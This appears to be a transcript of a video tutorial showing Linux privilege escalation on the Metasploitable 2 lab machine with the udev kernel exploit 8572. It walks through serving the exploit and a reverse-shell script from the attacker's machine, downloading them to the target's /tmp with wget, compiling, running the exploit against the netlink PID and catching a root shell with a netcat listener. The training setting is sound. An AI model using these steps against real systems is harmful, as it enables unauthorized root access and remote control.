Hey guys. So in the previous video we saw how we can use the BadBash tool to exploit the Shellshock vulnerability. But we were only able to get a normal command shell. That's just the shell right here, which is just a normal command shell; it's a low-level shell. It's not a root shell, which means you can only run some user-level commands.
But to run system-level commands or whatever, you must escalate your privileges and get to root. Escalating privileges basically means adding more rights or permissions to the user account. So in this video, I'm going to show you guys how you can do Linux privilege escalation by exploiting a kernel vulnerability. A privilege escalation attack is a type of network intrusion that takes advantage of programming errors or design flaws to grant the attacker more access, elevated access to the network and its dedicated apps and data and stuff like that. Since we already have a regular shell up and running, let's look at the kernel version.
So you can just type uname -a. We have the 2.6.24 kernel version running, so that's a pretty old one, because current versions are at about 4.0. So we can find a lot of exploits for that particular machine. You can also type lsb_release -a to see more data about the distribution.
There you go, we got more information. And now I want to do a local exploit on this particular version. To find exploits for a version, you can do it in multiple ways. We can do it like we have been doing, using searchsploit, which is a built-in tool in Kali, or you can use an external database like a website; there's a cool website called exploit-db.com that'll give you exploits for the versions you're looking for. Or you can just type into Google whatever exploit you're looking for for that particular version. Either way. But I'm going to go with searchsploit since it's built in. I'm just going to use searchsploit, and I'm actually going to look for "privilege", because I want to see if there are any privilege escalation exploits.
I want to grep for "linux", because I don't care about other machines right now; we know that our target machine is Metasploitable 2, which is a Linux machine. I also want to grep for "kernel", just kernel exploits. And what else? Oh, and the last thing I want to do is grep for version 2.6. Let's see. Awesome. So one of the best ones is the 8572 exploit.
Let's see if we have it here. We can use it for Linux privilege escalation if we have it. Looks like... oh, actually we do. Awesome. There you go. Just copy it. And actually, you know what, let me cat it so that I can take a look at it.
That's the path, so let's look at it. Before you execute anything, always take a look at the code first, just so that you can analyze it and see what exactly it does. Enter. Looks like it's C code; most exploits are in C, so you've got to use a GCC compiler to build it, and then give it executable permissions, stuff like that. This one looks like an exploit that leverages the udev functionality that is meant to run arbitrary commands when a device is removed.
So that's what we're looking for right here, so it's a perfect one. And let's look for... well, we already got it, so we're just going to execute it now. Well, actually, before we execute it, we need to make sure that our Apache server is running. So let's do that real quick: service apache2 restart, and then service apache2 status to see if it's actually working or not. Perfect, so it's running.
Now what I want to do is create a symbolic link between the directory where the exploit is located and the directory that serves files on the server, so that later I can download the exploit directly from the server. That's what I'm going to do. So to make a link, you can just type ln -s and the path, which in this case was, let's see, that was linux.
So just copy that. And we want to copy that to our local... our server, sorry. So that would be /var/www/html. Enter. It says the file already exists, because I already tried this before; that's why it's giving me that error.
But if you're trying this for the first time, you should not be getting that error. Okay, well, that's perfect, because we already have it installed. Actually, hold on. I think that's because... oh, I know why. I didn't type "local" either.
I don't have it installed. So... okay, that's fine. We have the exact exploit under linux/local. That's right, it's in www. It already exists, okay.
So our next step is to create the payload that'll run from the /tmp directory on the target. So first we need to create the file to execute. So on Kali right here, let's create a file in our server directory, /var/www/html, and just name it something like "run". Since it's a bash script, I'm going to start it with the bash shebang line so it runs in bash.
And now I want it to connect back to a listener here, because we want it to call back, so I point it at my IP address, which ends in 176. So let's go with that. Oh, wait, but this one shows 1. So I'm going to restart that real quick and type 192.168.0.176. That's it. You don't really need to do anything after that.
I can just save it. Oh wait, this is meant to be bash, so let's type in bash. And yes, that is it; :w to save it. And now let's go back to our shell, and I need to repopulate it since the IPs changed. Let me check my Metasploitable to see if it's still the same... no, that's changed.
Okay, so now I'm going to do it. Let me just start my BadBash real quick again. This right here will be bash, and cancel... So let's wait till we get the shell. Awesome. So now, since I've got this particular file, I want to get it in here. So let's go to the /tmp folder first, because we want to get the exploit in there, and just remove whatever is in here.
ls it. And now I want to do wget http://192.168.0.176/run, where 192.168.0.176 is my Kali Linux IP and run is the file I want to download, and then ls it and see. Yep, we got it. Awesome. Now, the next thing is to use wget again, but this time we need to get the 8572 script. So for that, wget http://192.168.0.176/ again, and that was under local, so getting it from local, and then 8572.c. Enter, and see if it downloaded.
Awesome, we got it downloaded. So since it's just a C file, a C script, we're going to compile it using the normal compiler command: gcc -o exploit 8572.c. ls. We didn't get it. I wonder why it didn't build.
Oh, that's because it's not able to find ld, the linker. So we need to point it at the directory containing ld with the -B option. So all you've got to do is type gcc -B /usr/bin, then output it as exploit, then 8572.c. There you go. So we got that built, an executable named exploit. Now all you've got to do is run it, but you will need to run it against a process ID, because this particular script, the documentation in this 8572.c file, says that we need to find the PID, which is the process identifier, of the netlink socket, which is usually the PID of the udev process minus one.
So we can do that easily by looking in /proc/net/netlink; that should give you all the netlink sockets, and whichever one is the only one whose PID is not zero, that is our PID. That's the one we need to run the exploit against. You can also check it by typing ps aux and then grep udev. This will give you that number plus one. As you can see, 229493.
Awesome. So all you've got to do now is run the exploit against that particular number. Before you do this, make sure you open the Netcat listener on port 4444 so that you can get a shell. Enter. Now go back and run the exploit with that PID and hit enter. There you go.
We got the host; we got the shell on it. Just type id. There you go, we got it. So that's one simple way to do it. It's really efficient if you want to try doing it this way, because you actually get the escalation. And when you do that, you can literally see whether you're just a local user or root: type whoami, and there you see you've got root privileges, so you can literally do everything at the executable level on this machine through this particular exploitation. Well, I hope you enjoyed this video.
We'll see you in the next one.